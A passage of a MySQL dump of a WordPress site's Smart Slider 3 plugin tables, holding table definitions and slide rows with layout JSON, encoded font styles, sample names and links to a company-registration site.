AsImFsaWduIjoibGVmdCJ9LHsiY29sb3IiOiJmYzI4MjhmZiIsImFmb250IjoiZ29vZ2xlKEBpbXBvcnQgdXJsKGh0dHA6Ly9mb250cy5nb29nbGVhcGlzLmNvbS9jc3M\\/ZmFtaWx5PVJhbGV3YXkpOyksQXJpYWwiLCJzaXplIjoiMjV8fHB4In0se31dfQ==\",\"widget-thumbnail-caption-placement\":\"overlay\",\"widget-thumbnail-caption-size\":\"100\",\"widgetshadow\":\"shadow\",\"widget-shadow-position-mode\":\"simple\",\"widget-shadow-position-area\":\"12\",\"widget-shadow-position-stack\":\"4\",\"widget-shadow-position-offset\":\"0\",\"widget-shadow-position-horizontal\":\"left\",\"widget-shadow-position-horizontal-position\":\"0\",\"widget-shadow-position-horizontal-unit\":\"px\",\"widget-shadow-position-vertical\":\"top\",\"widget-shadow-position-vertical-position\":\"0\",\"widget-shadow-position-vertical-unit\":\"px\",\"widget-shadow-shadow\":\"$ss$\\/plugins\\/widgetshadow\\/shadow\\/shadow\\/shadow\\/dark.png\",\"widgets\":\"thumbnail\"}','2016-03-12 20:45:45','',0);
/*!40000 ALTER TABLE `wpxb_nextend2_smartslider3_sliders` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_nextend2_smartslider3_sliders_xref`
--

DROP TABLE IF EXISTS `wpxb_nextend2_smartslider3_sliders_xref`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_nextend2_smartslider3_sliders_xref` (
  `group_id` int(11) NOT NULL,
  `slider_id` int(11) NOT NULL,
  `ordering` int(11) NOT NULL DEFAULT 0,
  PRIMARY KEY (`group_id`,`slider_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_nextend2_smartslider3_sliders_xref`
--

LOCK TABLES `wpxb_nextend2_smartslider3_sliders_xref` WRITE;
/*!40000 ALTER TABLE `wpxb_nextend2_smartslider3_sliders_xref` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpxb_nextend2_smartslider3_sliders_xref` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_nextend2_smartslider3_slides`
--

DROP TABLE IF EXISTS `wpxb_nextend2_smartslider3_slides`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_nextend2_smartslider3_slides` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` varchar(200) NOT NULL,
  `slider` int(11) NOT NULL,
  `publish_up` datetime NOT NULL,
  `publish_down` datetime NOT NULL,
  `published` tinyint(1) NOT NULL,
  `first` int(11) NOT NULL,
  `slide` longtext DEFAULT NULL,
  `description` text NOT NULL,
  `thumbnail` varchar(255) NOT NULL,
  `params` text NOT NULL,
  `ordering` int(11) NOT NULL,
  `generator_id` int(11) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=10 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_nextend2_smartslider3_slides`
--

LOCK TABLES `wpxb_nextend2_smartslider3_slides` WRITE;
/*!40000 ALTER TABLE `wpxb_nextend2_smartslider3_slides` DISABLE KEYS */;
INSERT INTO `wpxb_nextend2_smartslider3_slides` VALUES (1,'Slide One',1,'2015-11-01 12:27:34','2025-11-11 12:27:34',1,0,'[{\"zIndex\":1,\"eye\":true,\"lock\":false,\"animations\":{\"repeatable\":0,\"specialZeroIn\":0,\"transformOriginIn\":\"50|*|50|*|0\",\"inPlayEvent\":\"\",\"repeatCount\":0,\"repeatStartDelay\":0,\"transformOriginLoop\":\"50|*|50|*|0\",\"loopPlayEvent\":\"\",\"loopPauseEvent\":\"\",\"loopStopEvent\":\"\",\"transformOriginOut\":\"50|*|50|*|0\",\"outPlayEvent\":\"\",\"instantOut\":1,\"in\":[],\"loop\":[],\"out\":[]},\"id\":null,\"class\":\"\",\"parentid\":null,\"name\":\"MartinDwyer\",\"namesynced\":1,\"crop\":\"visible\",\"inneralign\":\"left\",\"parallax\":0,\"adaptivefont\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"responsiveposition\":1,\"responsivesize\":1,\"desktopportraitleft\":0,\"desktopportraittop\":-267,\"desktopportraitwidth\":\"auto\",\"desktopportraitheight\":\"auto\",\"desktopportraitalign\":\"center\",\"desktopportraitvalign\":\"bottom\",\"desktopportraitparentalign\":\"center\",\"desktopportraitparentvalign\":\"middle\",\"desktopportraitfontsize\":100,\"mobileportraitleft\":0,\"mobileportraittop\":-319,\"mobileportraitalign\":\"center\",\"mobileportraitvalign\":\"bottom\",\"mobileportraitfontsize\":120,\"items\":[{\"type\":\"heading\",\"values\":{\"link\":\"#|*|_self\",\"font\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siZXh0cmEiOiIiLCJjb2xvciI6IjBiMGIwYmZmIiwic2l6ZSI6IjM2fHxweCIsInRzaGFkb3ciOiIwfCp8MHwqfDB8KnwwMDAwMDBmZiIsImFmb250IjoiUmFsZXdheSxBcmlhbCIsImxpbmVoZWlnaHQiOiIxIiwiYm9sZCI6MCwiaXRhbGljIjowLCJ1bmRlcmxpbmUiOjAsImFsaWduIjoiY2VudGVyIiwibGV0dGVyc3BhY2luZyI6IjEwcHgiLCJ3b3Jkc3BhY2luZyI6Im5vcm1hbCIsInRleHR0cmFuc2Zvcm0iOiJ1cHBlcmNhc2UifSx7ImV4dHJhIjoiIn0seyJleHRyYSI6IiJ9XX0=\",\"style\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siYmFja2dyb3VuZGNvbG9yIjoiZmZmZmZmY2MiLCJwYWRkaW5nIjoiMC44fCp8MXwqfDAuOHwqfDF8KnxlbSIsImJveHNoYWRvdyI6IjB8KnwwfCp8MHwqfDB8KnwwMDAwMDBmZiIsImJvcmRlciI6IjB8Knxzb2xpZHwqfDAwMDAwMGZmIiwiYm9yZGVycmFkaXVzIjoiMCIsImV4dHJhIjoiIn0seyJleHRyYSI6IiJ9XX0=\",\"heading\":\"Martin Dwyer\",\"fullwidth\":\"1\",\"nowrap\":\"1\"}}]},{\"zIndex\":2,\"eye\":false,\"lock\":false,\"animations\":{\"repeatable\":0,\"specialZeroIn\":0,\"transformOriginIn\":\"50|*|50|*|0\",\"inPlayEvent\":\"\",\"repeatCount\":0,\"repeatStartDelay\":0,\"transformOriginLoop\":\"50|*|50|*|0\",\"loopPlayEvent\":\"\",\"loopPauseEvent\":\"\",\"loopStopEvent\":\"\",\"transformOriginOut\":\"50|*|50|*|0\",\"outPlayEvent\":\"\",\"instantOut\":1,\"in\":[],\"loop\":[],\"out\":[]},\"id\":null,\"class\":\"\",\"parentid\":null,\"name\":\"ApplicationDeveloper\",\"namesynced\":1,\"crop\":\"visible\",\"inneralign\":\"left\",\"parallax\":0,\"adaptivefont\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"responsiveposition\":1,\"responsivesize\":1,\"desktopportraitleft\":0,\"desktopportraittop\":338,\"desktopportraitwidth\":\"auto\",\"desktopportraitheight\":\"auto\",\"desktopportraitalign\":\"center\",\"desktopportraitvalign\":\"top\",\"desktopportraitparentalign\":\"center\",\"desktopportraitparentvalign\":\"middle\",\"desktopportraitfontsize\":100,\"mobileportraitleft\":0,\"mobileportraittop\":291,\"mobileportraitalign\":\"center\",\"mobileportraitvalign\":\"top\",\"mobileportraitfontsize\":120,\"items\":[{\"type\":\"heading\",\"values\":{\"link\":\"#|*|_self\",\"font\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siZXh0cmEiOiIiLCJjb2xvciI6ImZmZmZmZmZmIiwic2l6ZSI6IjIyfHxweCIsInRzaGFkb3ciOiIwfCp8MHwqfDB8KnwwMDAwMDBmZiIsImFmb250IjoiUmFsZXdheSxBcmlhbCIsImxpbmVoZWlnaHQiOiIxIiwiYm9sZCI6MCwiaXRhbGljIjowLCJ1bmRlcmxpbmUiOjAsImFsaWduIjoiY2VudGVyIiwibGV0dGVyc3BhY2luZyI6IjJweCIsIndvcmRzcGFjaW5nIjoibm9ybWFsIiwidGV4dHRyYW5zZm9ybSI6Im5vbmUifSx7ImV4dHJhIjoiIn0seyJleHRyYSI6IiJ9XX0=\",\"style\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siYmFja2dyb3VuZGNvbG9yIjoiMDAwMDAwY2MiLCJwYWRkaW5nIjoiMC44fCp8MXwqfDAuOHwqfDF8KnxlbSIsImJveHNoYWRvdyI6IjB8KnwwfCp8MHwqfDB8KnwwMDAwMDBmZiIsImJvcmRlciI6IjB8Knxzb2xpZHwqfDAwMDAwMGZmIiwiYm9yZGVycmFkaXVzIjoiMCIsImV4dHJhIjoiIn0seyJleHRyYSI6IiJ9XX0=\",\"heading\":\"Application Developer\",\"fullwidth\":\"1\",\"nowrap\":\"1\"}}]},{\"zIndex\":3,\"eye\":false,\"lock\":false,\"animations\":{\"repeatable\":0,\"specialZeroIn\":0,\"transformOriginIn\":\"50|*|50|*|0\",\"inPlayEvent\":\"\",\"repeatCount\":0,\"repeatStartDelay\":0,\"transformOriginLoop\":\"50|*|50|*|0\",\"loopPlayEvent\":\"\",\"loopPauseEvent\":\"\",\"loopStopEvent\":\"\",\"transformOriginOut\":\"50|*|50|*|0\",\"outPlayEvent\":\"\",\"instantOut\":1,\"in\":[],\"loop\":[],\"out\":[]},\"id\":null,\"class\":\"\",\"parentid\":null,\"name\":\"Headinglayer\",\"namesynced\":0,\"crop\":\"visible\",\"inneralign\":\"left\",\"parallax\":0,\"adaptivefont\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"responsiveposition\":1,\"responsivesize\":1,\"desktopportraitleft\":-398,\"desktopportraittop\":-60,\"desktopportraitwidth\":\"auto\",\"desktopportraitheight\":\"auto\",\"desktopportraitalign\":\"center\",\"desktopportraitvalign\":\"middle\",\"desktopportraitparentalign\":\"center\",\"desktopportraitparentvalign\":\"middle\",\"desktopportraitfontsize\":100,\"items\":[{\"type\":\"heading\",\"values\":{\"heading\":\"Heading layer\",\"font\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siZXh0cmEiOiIiLCJjb2xvciI6ImZmZmZmZmZmIiwic2l6ZSI6IjM2fHxweCIsInRzaGFkb3ciOiIwfCp8MHwqfDB8KnwwMDAwMDBmZiIsImFmb250IjoiJ0Ryb2lkIFNhbnMnLEFyaWFsIiwibGluZWhlaWdodCI6IjEuNSIsImJvbGQiOjAsIml0YWxpYyI6MCwidW5kZXJsaW5lIjowLCJhbGlnbiI6ImNlbnRlciIsImxldHRlcnNwYWNpbmciOiJub3JtYWwiLCJ3b3Jkc3BhY2luZyI6Im5vcm1hbCIsInRleHR0cmFuc2Zvcm0iOiJjYXBpdGFsaXplIn0se31dfQ==\",\"style\":\"10002\",\"link\":\"#|*|_self\",\"fullwidth\":\"1\",\"nowrap\":\"1\"}}]},{\"zIndex\":4,\"eye\":false,\"lock\":false,\"animations\":{\"repeatable\":0,\"specialZeroIn\":0,\"transformOriginIn\":\"50|*|50|*|0\",\"inPlayEvent\":\"\",\"repeatCount\":0,\"repeatStartDelay\":0,\"transformOriginLoop\":\"50|*|50|*|0\",\"loopPlayEvent\":\"\",\"loopPauseEvent\":\"\",\"loopStopEvent\":\"\",\"transformOriginOut\":\"50|*|50|*|0\",\"outPlayEvent\":\"\",\"instantOut\":1,\"in\":[],\"loop\":[],\"out\":[]},\"id\":null,\"class\":\"\",\"parentid\":null,\"name\":\"ClickHere\",\"namesynced\":1,\"crop\":\"visible\",\"inneralign\":\"left\",\"parallax\":0,\"adaptivefont\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"responsiveposition\":1,\"responsivesize\":1,\"desktopportraitleft\":-409,\"desktopportraittop\":20,\"desktopportraitwidth\":\"auto\",\"desktopportraitheight\":\"auto\",\"desktopportraitalign\":\"center\",\"desktopportraitvalign\":\"middle\",\"desktopportraitparentalign\":\"center\",\"desktopportraitparentvalign\":\"middle\",\"desktopportraitfontsize\":100,\"items\":[{\"type\":\"button\",\"values\":{\"content\":\"Click Here\",\"font\":\"1103\",\"style\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siYmFja2dyb3VuZGNvbG9yIjoiNWNiYTNjZmYiLCJwYWRkaW5nIjoiMTB8KnwzMHwqfDEwfCp8MzB8KnxweCIsImJveHNoYWRvdyI6IjF8KnwyfCp8MXwqfDF8Knw4MTg5OGRmZiIsImJvcmRlciI6IjF8Knxub25lfCp8MDAwMDAwZmYiLCJib3JkZXJyYWRpdXMiOiIwIiwiZXh0cmEiOiIifSx7fV19\",\"link\":\"http://companyregistration.online/shop/tax-registration/vat-registration-urgent/|*|_self\",\"fullwidth\":\"0\",\"nowrap\":\"1\"}}]},{\"zIndex\":5,\"eye\":false,\"lock\":false,\"animations\":{\"repeatable\":0,\"specialZeroIn\":0,\"transformOriginIn\":\"50|*|50|*|0\",\"inPlayEvent\":\"\",\"repeatCount\":0,\"repeatStartDelay\":0,\"transformOriginLoop\":\"50|*|50|*|0\",\"loopPlayEvent\":\"\",\"loopPauseEvent\":\"\",\"loopStopEvent\":\"\",\"transformOriginOut\":\"50|*|50|*|0\",\"outPlayEvent\":\"\",\"instantOut\":1,\"in\":[],\"loop\":[],\"out\":[]},\"id\":null,\"class\":\"\",\"parentid\":null,\"name\":\"ahref=\\\"\\\"/aLoremipsumdolorsitamet,ah\",\"namesynced\":1,\"crop\":\"visible\",\"inneralign\":\"center\",\"parallax\":0,\"adaptivefont\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"responsiveposition\":1,\"responsivesize\":1,\"desktopportraitleft\":380,\"desktopportraittop\":167,\"desktopportraitwidth\":400,\"desktopportraitheight\":\"auto\",\"desktopportraitalign\":\"left\",\"desktopportraitvalign\":\"top\",\"desktopportraitparentalign\":\"center\",\"desktopportraitparentvalign\":\"middle\",\"desktopportraitfontsize\":100,\"items\":[{\"type\":\"text\",\"values\":{\"content\":\"<a href=\\\"\\\"></a>Lorem ipsum dolor sit amet, <a href=\\\"#\\\">consectetur adipiscing</a> elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.<a href=\\\"\\\"></a>\",\"font\":\"1304\",\"style\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siYmFja2dyb3VuZGNvbG9yIjoiZmZmZmZmMDAiLCJwYWRkaW5nIjoiMHwqfDB8KnwwfCp8MHwqfHB4IiwiYm94c2hhZG93IjoiMXwqfDJ8KnwxfCp8MXwqfGNlZDNkNWZmIiwiYm9yZGVyIjoiMHwqfHNvbGlkfCp8MDAwMDAwZmYiLCJib3JkZXJyYWRpdXMiOiIwIiwiZXh0cmEiOiIifSx7ImV4dHJhIjoiIn1dfQ==\",\"contenttablet\":\"\",\"contentmobile\":\"\"}}]}]','','http://smartslider3.com/sample/developerthumbnail.jpg','{\"generator_id\":\"0\",\"first\":\"0\",\"static-slide\":\"0\",\"thumbnailType\":\"default\",\"backgroundColor\":\"ffffff00\",\"backgroundImage\":\"http:\\/\\/smartslider3.com\\/sample\\/programmer.jpg\",\"backgroundImageOpacity\":\"100\",\"backgroundAlt\":\"\",\"backgroundMode\":\"default\",\"link\":\"|*|_self\",\"slide-duration\":\"0\",\"background-animation\":\"\",\"background-animation-speed\":\"default\"}',0,0),(2,'Slide Two',1,'2015-11-01 12:27:34','2025-11-11 12:27:34',1,0,'[{\"zIndex\":1,\"eye\":false,\"lock\":false,\"animations\":{\"repeatable\":0,\"specialZeroIn\":0,\"transformOriginIn\":\"50|*|50|*|0\",\"inPlayEvent\":\"\",\"repeatCount\":0,\"repeatStartDelay\":0,\"transformOriginLoop\":\"50|*|50|*|0\",\"loopPlayEvent\":\"\",\"loopPauseEvent\":\"\",\"loopStopEvent\":\"\",\"transformOriginOut\":\"50|*|50|*|0\",\"outPlayEvent\":\"\",\"instantOut\":1,\"in\":[],\"loop\":[],\"out\":[]},\"id\":null,\"parentid\":null,\"class\":\"\",\"name\":\"RachelWright\",\"namesynced\":1,\"crop\":\"visible\",\"inneralign\":\"left\",\"parallax\":0,\"adaptivefont\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"responsiveposition\":1,\"responsivesize\":1,\"desktopportraitleft\":0,\"desktopportraittop\":-267,\"desktopportraitwidth\":\"auto\",\"desktopportraitheight\":\"auto\",\"desktopportraitalign\":\"center\",\"desktopportraitvalign\":\"bottom\",\"desktopportraitparentalign\":\"center\",\"desktopportraitparentvalign\":\"middle\",\"desktopportraitfontsize\":100,\"mobileportraitleft\":0,\"mobileportraittop\":-319,\"mobileportraitalign\":\"center\",\"mobileportraitvalign\":\"bottom\",\"mobileportraitfontsize\":120,\"items\":[{\"type\":\"heading\",\"values\":{\"link\":\"#|*|_self\",\"font\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siZXh0cmEiOiIiLCJjb2xvciI6IjBiMGIwYmZmIiwic2l6ZSI6IjM2fHxweCIsInRzaGFkb3ciOiIwfCp8MHwqfDB8KnwwMDAwMDBmZiIsImFmb250IjoiUmFsZXdheSxBcmlhbCIsImxpbmVoZWlnaHQiOiIxIiwiYm9sZCI6MCwiaXRhbGljIjowLCJ1bmRlcmxpbmUiOjAsImFsaWduIjoiY2VudGVyIiwibGV0dGVyc3BhY2luZyI6IjEwcHgiLCJ3b3Jkc3BhY2luZyI6Im5vcm1hbCIsInRleHR0cmFuc2Zvcm0iOiJ1cHBlcmNhc2UifSx7ImV4dHJhIjoiIn0seyJleHRyYSI6IiJ9XX0=\",\"style\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siYmFja2dyb3VuZGNvbG9yIjoiZmZmZmZmY2MiLCJwYWRkaW5nIjoiMC44fCp8MXwqfDAuOHwqfDF8KnxlbSIsImJveHNoYWRvdyI6IjB8KnwwfCp8MHwqfDB8KnwwMDAwMDBmZiIsImJvcmRlciI6IjB8Knxzb2xpZHwqfDAwMDAwMGZmIiwiYm9yZGVycmFkaXVzIjoiMCIsImV4dHJhIjoiIn0seyJleHRyYSI6IiJ9XX0=\",\"heading\":\"Rachel Wright\",\"fullwidth\":\"1\",\"nowrap\":\"1\"}}]},{\"zIndex\":2,\"eye\":false,\"lock\":false,\"animations\":{\"repeatable\":0,\"specialZeroIn\":0,\"transformOriginIn\":\"50|*|50|*|0\",\"inPlayEvent\":\"\",\"repeatCount\":0,\"repeatStartDelay\":0,\"transformOriginLoop\":\"50|*|50|*|0\",\"loopPlayEvent\":\"\",\"loopPauseEvent\":\"\",\"loopStopEvent\":\"\",\"transformOriginOut\":\"50|*|50|*|0\",\"outPlayEvent\":\"\",\"instantOut\":1,\"in\":[],\"loop\":[],\"out\":[]},\"id\":null,\"parentid\":null,\"class\":\"\",\"name\":\"ArtDirector&Photographer\",\"namesynced\":1,\"crop\":\"visible\",\"inneralign\":\"left\",\"parallax\":0,\"adaptivefont\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"responsiveposition\":1,\"responsivesize\":1,\"desktopportraitleft\":0,\"desktopportraittop\":338,\"desktopportraitwidth\":\"auto\",\"desktopportraitheight\":\"auto\",\"desktopportraitalign\":\"center\",\"desktopportraitvalign\":\"top\",\"desktopportraitparentalign\":\"center\",\"desktopportraitparentvalign\":\"middle\",\"desktopportraitfontsize\":100,\"mobileportraitleft\":0,\"mobileportraittop\":291,\"mobileportraitalign\":\"center\",\"mobileportraitvalign\":\"top\",\"mobileportraitfontsize\":120,\"items\":[{\"type\":\"heading\",\"values\":{\"link\":\"#|*|_self\",\"font\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siZXh0cmEiOiIiLCJjb2xvciI6ImZmZmZmZmZmIiwic2l6ZSI6IjIyfHxweCIsInRzaGFkb3ciOiIwfCp8MHwqfDB8KnwwMDAwMDBmZiIsImFmb250IjoiUmFsZXdheSxBcmlhbCIsImxpbmVoZWlnaHQiOiIxIiwiYm9sZCI6MCwiaXRhbGljIjowLCJ1bmRlcmxpbmUiOjAsImFsaWduIjoiY2VudGVyIiwibGV0dGVyc3BhY2luZyI6IjJweCIsIndvcmRzcGFjaW5nIjoibm9ybWFsIiwidGV4dHRyYW5zZm9ybSI6Im5vbmUifSx7ImV4dHJhIjoiIn0seyJleHRyYSI6IiJ9XX0=\",\"style\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siYmFja2dyb3VuZGNvbG9yIjoiMDAwMDAwY2MiLCJwYWRkaW5nIjoiMC44fCp8MXwqfDAuOHwqfDF8KnxlbSIsImJveHNoYWRvdyI6IjB8KnwwfCp8MHwqfDB8KnwwMDAwMDBmZiIsImJvcmRlciI6IjB8Knxzb2xpZHwqfDAwMDAwMGZmIiwiYm9yZGVycmFkaXVzIjoiMCIsImV4dHJhIjoiIn0seyJleHRyYSI6IiJ9XX0=\",\"heading\":\"Art Director & Photographer\",\"fullwidth\":\"1\",\"nowrap\":\"1\"}}]}]','','http://smartslider3.com/sample/artdirectorthumbnail.jpg','{\"generator_id\":\"0\",\"first\":\"0\",\"static-slide\":\"0\",\"backgroundColor\":\"ffffff00\",\"backgroundImage\":\"http://smartslider3.com/sample/free1.jpg\",\"backgroundImageOpacity\":\"100\",\"backgroundMode\":\"default\",\"link\":\"|*|_self\",\"slide-duration\":\"0\",\"background-animation\":\"\",\"background-animation-speed\":\"default\"}',1,0),(3,'Slide Three',1,'2015-11-01 12:27:34','2025-11-11 12:27:34',1,0,'[{\"zIndex\":1,\"eye\":false,\"lock\":false,\"animations\":{\"repeatable\":0,\"specialZeroIn\":0,\"transformOriginIn\":\"50|*|50|*|0\",\"inPlayEvent\":\"\",\"repeatCount\":0,\"repeatStartDelay\":0,\"transformOriginLoop\":\"50|*|50|*|0\",\"loopPlayEvent\":\"\",\"loopPauseEvent\":\"\",\"loopStopEvent\":\"\",\"transformOriginOut\":\"50|*|50|*|0\",\"outPlayEvent\":\"\",\"instantOut\":1,\"in\":[],\"loop\":[],\"out\":[]},\"id\":null,\"parentid\":null,\"class\":\"\",\"name\":\"AndrewButler\",\"namesynced\":1,\"crop\":\"visible\",\"inneralign\":\"left\",\"parallax\":0,\"adaptivefont\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"responsiveposition\":1,\"responsivesize\":1,\"desktopportraitleft\":0,\"desktopportraittop\":-267,\"desktopportraitwidth\":\"auto\",\"desktopportraitheight\":\"auto\",\"desktopportraitalign\":\"center\",\"desktopportraitvalign\":\"bottom\",\"desktopportraitparentalign\":\"center\",\"desktopportraitparentvalign\":\"middle\",\"desktopportraitfontsize\":100,\"mobileportraitleft\":0,\"mobileportraittop\":-319,\"mobileportraitalign\":\"center\",\"mobileportraitvalign\":\"bottom\",\"mobileportraitfontsize\":120,\"items\":[{\"type\":\"heading\",\"values\":{\"link\":\"#|*|_self\",\"font\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siZXh0cmEiOiIiLCJjb2xvciI6IjBiMGIwYmZmIiwic2l6ZSI6IjM2fHxweCIsInRzaGFkb3ciOiIwfCp8MHwqfDB8KnwwMDAwMDBmZiIsImFmb250IjoiUmFsZXdheSxBcmlhbCIsImxpbmVoZWlnaHQiOiIxIiwiYm9sZCI6MCwiaXRhbGljIjowLCJ1bmRlcmxpbmUiOjAsImFsaWduIjoiY2VudGVyIiwibGV0dGVyc3BhY2luZyI6IjEwcHgiLCJ3b3Jkc3BhY2luZyI6Im5vcm1hbCIsInRleHR0cmFuc2Zvcm0iOiJ1cHBlcmNhc2UifSx7ImV4dHJhIjoiIn0seyJleHRyYSI6IiJ9XX0=\",\"style\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siYmFja2dyb3VuZGNvbG9yIjoiZmZmZmZmY2MiLCJwYWRkaW5nIjoiMC44fCp8MXwqfDAuOHwqfDF8KnxlbSIsImJveHNoYWRvdyI6IjB8KnwwfCp8MHwqfDB8KnwwMDAwMDBmZiIsImJvcmRlciI6IjB8Knxzb2xpZHwqfDAwMDAwMGZmIiwiYm9yZGVycmFkaXVzIjoiMCIsImV4dHJhIjoiIn0seyJleHRyYSI6IiJ9XX0=\",\"heading\":\"Andrew Butler\",\"fullwidth\":\"1\",\"nowrap\":\"1\"}}]},{\"zIndex\":2,\"eye\":false,\"lock\":false,\"animations\":{\"repeatable\":0,\"specialZeroIn\":0,\"transformOriginIn\":\"50|*|50|*|0\",\"inPlayEvent\":\"\",\"repeatCount\":0,\"repeatStartDelay\":0,\"transformOriginLoop\":\"50|*|50|*|0\",\"loopPlayEvent\":\"\",\"loopPauseEvent\":\"\",\"loopStopEvent\":\"\",\"transformOriginOut\":\"50|*|50|*|0\",\"outPlayEvent\":\"\",\"instantOut\":1,\"in\":[],\"loop\":[],\"out\":[]},\"id\":null,\"parentid\":null,\"class\":\"\",\"name\":\"Photographer&Illustrator\",\"namesynced\":1,\"crop\":\"visible\",\"inneralign\":\"left\",\"parallax\":0,\"adaptivefont\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"responsiveposition\":1,\"responsivesize\":1,\"desktopportraitleft\":0,\"desktopportraittop\":338,\"desktopportraitwidth\":\"auto\",\"desktopportraitheight\":\"auto\",\"desktopportraitalign\":\"center\",\"desktopportraitvalign\":\"top\",\"desktopportraitparentalign\":\"center\",\"desktopportraitparentvalign\":\"middle\",\"desktopportraitfontsize\":100,\"mobileportraitleft\":0,\"mobileportraittop\":291,\"mobileportraitalign\":\"center\",\"mobileportraitvalign\":\"top\",\"mobileportraitfontsize\":120,\"items\":[{\"type\":\"heading\",\"values\":{\"link\":\"#|*|_self\",\"font\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siZXh0cmEiOiIiLCJjb2xvciI6ImZmZmZmZmZmIiwic2l6ZSI6IjIyfHxweCIsInRzaGFkb3ciOiIwfCp8MHwqfDB8KnwwMDAwMDBmZiIsImFmb250IjoiUmFsZXdheSxBcmlhbCIsImxpbmVoZWlnaHQiOiIxIiwiYm9sZCI6MCwiaXRhbGljIjowLCJ1bmRlcmxpbmUiOjAsImFsaWduIjoiY2VudGVyIiwibGV0dGVyc3BhY2luZyI6IjJweCIsIndvcmRzcGFjaW5nIjoibm9ybWFsIiwidGV4dHRyYW5zZm9ybSI6Im5vbmUifSx7ImV4dHJhIjoiIn0seyJleHRyYSI6IiJ9XX0=\",\"style\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siYmFja2dyb3VuZGNvbG9yIjoiMDAwMDAwY2MiLCJwYWRkaW5nIjoiMC44fCp8MXwqfDAuOHwqfDF8KnxlbSIsImJveHNoYWRvdyI6IjB8KnwwfCp8MHwqfDB8KnwwMDAwMDBmZiIsImJvcmRlciI6IjB8Knxzb2xpZHwqfDAwMDAwMGZmIiwiYm9yZGVycmFkaXVzIjoiMCIsImV4dHJhIjoiIn0seyJleHRyYSI6IiJ9XX0=\",\"heading\":\"Photographer & Illustrator\",\"fullwidth\":\"1\",\"nowrap\":\"1\"}}]}]','','http://smartslider3.com/sample/photographerthumbnail.jpg','{\"generator_id\":\"0\",\"first\":\"0\",\"static-slide\":\"0\",\"backgroundColor\":\"ffffff00\",\"backgroundImage\":\"http://smartslider3.com/sample/photographer.jpg\",\"backgroundImageOpacity\":\"100\",\"backgroundMode\":\"default\",\"link\":\"|*|_self\",\"slide-duration\":\"0\",\"background-animation\":\"\",\"background-animation-speed\":\"default\"}',2,0),(4,'Front page BEE',2,'2016-03-11 18:48:04','2026-03-12 18:48:04',1,0,'[]','','$/uploads/2016/03/Front-page-BEE.png','{\"generator_id\":\"0\",\"first\":\"0\",\"static-slide\":\"0\",\"thumbnailType\":\"default\",\"backgroundColor\":\"ffffff00\",\"backgroundImage\":\"$\\/uploads\\/2016\\/03\\/Front-page-BEE.png\",\"backgroundImageOpacity\":\"100\",\"backgroundAlt\":\"\",\"backgroundMode\":\"default\",\"link\":\"http:\\/\\/companyregistration.online\\/product-category\\/bee-requirements\\/|*|_self\",\"slide-duration\":\"0\",\"background-animation\":\"\",\"background-animation-speed\":\"default\"}',4,0),(5,'Front page Biz Tools',2,'2016-03-11 18:48:04','2026-03-12 